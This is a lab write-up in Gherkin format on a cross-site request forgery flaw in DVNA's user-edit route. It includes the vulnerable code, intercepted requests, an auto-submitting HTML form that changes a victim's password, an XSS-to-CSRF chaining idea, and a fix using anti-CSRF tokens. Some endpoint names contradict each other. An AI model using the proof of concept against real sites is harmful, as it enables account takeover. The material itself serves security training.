## Version 1.4.2
## language: en

Feature:
  TOE:
    DVNA
  Category:
    Insecure Interaction Between Components
  Location:
    /app/useredit - Form
  CWE:
    CWE-0352: Cross-Site Request Forgery (CSRF) -compound-
      https://cwe.mitre.org/data/definitions/352.html
    CWE-0346: Origin Validation Error -base-
      https://cwe.mitre.org/data/definitions/346.html
    CWE-0345: Insufficient Verification of Data Authenticity -class-
      https://cwe.mitre.org/data/definitions/345.html
    CWE-0949: SFP Secondary Cluster: Faulty Endpoint Authentication -category-
      https://cwe.mitre.org/data/definitions/949.html
  CAPEC:
    CAPEC-467: Cross Site Identification -detailed-
      http://capec.mitre.org/data/definitions/467.html
    CAPEC-062: Cross Site Request Forgery -standard-
      http://capec.mitre.org/data/definitions/62.html
    CAPEC-021: Exploitation of Trusted Credentials -meta-
      http://capec.mitre.org/data/definitions/21.html
  Rule:
    REQ.263: https://fluidattacks.com/web/es/rules/263/
  Goal:
    Send a request on behalf of the logged in user without their action
  Recommendation:
    Implement an anti-CSRF token

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running DVNA in a docker container at
    """
    http://localhost:8000/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/
    Then I can navigate the site

  Scenario: Static detection
  No access control
    Given I see the code at "dvna/routes/app.js"
    """
    144 module.exports.userEditSubmit = function (req, res) {
    145   db.User.find({
    146     where: {
    147       'id': req.body.id
    148     }
    149   }).then(user =>{
    150     if(req.body.password.length>0){
    151       if(req.body.password.length>0){
    152         if (req.body.password == req.body.cpassword) {
    153           user.password = bCrypt.hashSync(req.body.password, bCrypt.genS
    altSync(10), null)
    154         }else{
    155           req.flash('warning', 'Passwords dont match')
    156           res.render('app/useredit', {
    157             userId: req.user.id,
    158             userEmail: req.user.email,
    159             userName: req.user.name,
    160           })
    161           return
    162         }
    163       }else{
    164         req.flash('warning', 'Invalid Password')
    165         res.render('app/useredit', {
    166           userId: req.user.id,
    167           userEmail: req.user.email,
    168           userName: req.user.name,
    169         })
    170         return
    171       }
    172     }
    173     user.email = req.body.email
    174     user.name = req.body.name
    175     user.save().then(function () {
    176       req.flash('success',"Updated successfully")
    177       res.render('app/useredit', {
    178         userId: req.body.id,
    179         userEmail: req.body.email,
    180         userName: req.body.name,
    181       })
    182     })
    183   })
    184 }
    """
    Then I see it executes the transaction with no regard for req origin at all

  Scenario: Dynamic detection
  Checking default routes
    Given I go to "http://localhost:8000/app/modifyproduct"
    Then I intercept a request to create a new product
    """
    POST /app/useredit HTTP/1.1
    Host: localhost:8000
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8000/app/useredit
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 42
    Connection: close
    Cookie: cookieconsent_status=dismiss; continueCode=qo61W2w2ZW6a3BeyxzDmjrPKl
    Y5bAyD0LO4XpRqkJQ8VE7g1ovNMn9kZ9wrE; connect.sid=s%3AbkE-ktw_GSO1pdPj7wsbVgd
    dUZKH5tf_.4hjFmNywNQEjr1mNN8MrylaQ52JWXOliji4kssQpxrs
    Upgrade-Insecure-Requests: 1

    id=1&name=a&email=a&password=v&cpassword=v
    """
    Then I try changing the host header to see if it accepts external requests
    """
    POST /app/useredit HTTP/1.1
    Host: test
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/
    66.0
    ...
    """
    And it returns the response
    """
    Updated successfully
    """
    Then it's vulnerable to CSRF

  Scenario: Exploitation
  Changing user password on behalf of another user
    Given I craft a page that POSTs a modification for a product owned by user
    """
    <FORM NAME="poc" ENCTYPE="application/x-www-form-urlencoded"
    action="http://127.0.0.1:8000/app/modifyproduct" METHOD="POST">
    <input type="hidden" name='id' value="2">
    <input type="hidden" name='name' value="somename">
    <input type="hidden" name='email' value="somemail@mail.com">
    <input type="hidden" name='password' value="pwnd">
    </FORM>
    <script>document.poc.submit();</script>
    """
    Then I send the link to the user with social engineering
    Then when they click on the link, their password gets changed
    And I get access to their account

  Scenario: Remediation
  Anti-csrf token
    Given I generate an anti-csrf token everytime the user edits a product
    And validate the token when recieving the POST req before saving changes
    Then CSRF isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.3/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.7/10 (High) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.7/10 (High) - CR:M/IR:M/AR:M

  Scenario: Correlations
    0079-*
      Given I inject an XSS payload that redirects to my CSRF
      Then everytime a user triggers the XSS their user data will get changed
      And I will have access to a multitude of accounts
